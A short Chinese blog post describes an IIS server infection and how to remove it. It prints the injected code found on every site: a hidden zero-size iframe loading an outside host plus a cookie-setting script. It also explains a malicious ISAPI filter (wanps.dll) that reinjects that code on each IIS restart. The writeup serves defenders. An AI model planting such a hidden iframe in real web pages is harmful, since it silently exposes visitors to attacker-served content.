IIS木马处理

<body>
< iframe   src=" http://css.scriptt.in/" height=0 width=0></ iframe >
< script   language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
documents.cookie="GAG5=1234567fuck;expires="+expires.toGMTString();
-->
</ script >
</body>

原以为是人为的,只是一个站点被修改了,结果经检查整个IIS上20多个站点全部中标,无一漏网..
网上查找了一下,询问此事的人多,真正解答的确少。
病毒症状:

经检查发下以下资料被更改

在IIS服务扩展里“ISAPI筛选器”增加了一个值,路径为:C:/..../SYSTEM32/inetsrv/wanps.dll
按路径找到该文件夹,发现里边共多出2个文件:wanps.dll     wanps.ini
而wanps.ini 内容指向: Redirector=C:/windows/help/wanps.txt
找到wanps.txt发现里边内容就是网页代码出多出的部分
每当IIS重启时木马会自动加载。
解决办法:
删除这3个文件,如果wanps.dll删不掉的话,重启IIS,就可以了
在ISAPI筛选器扩展里增加asp.net正常值(不同的服务值也不一样),这样IIS就正常了。
服务器管理员们应该注意加强安全管理了,不要给这些小人可乘之机。 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值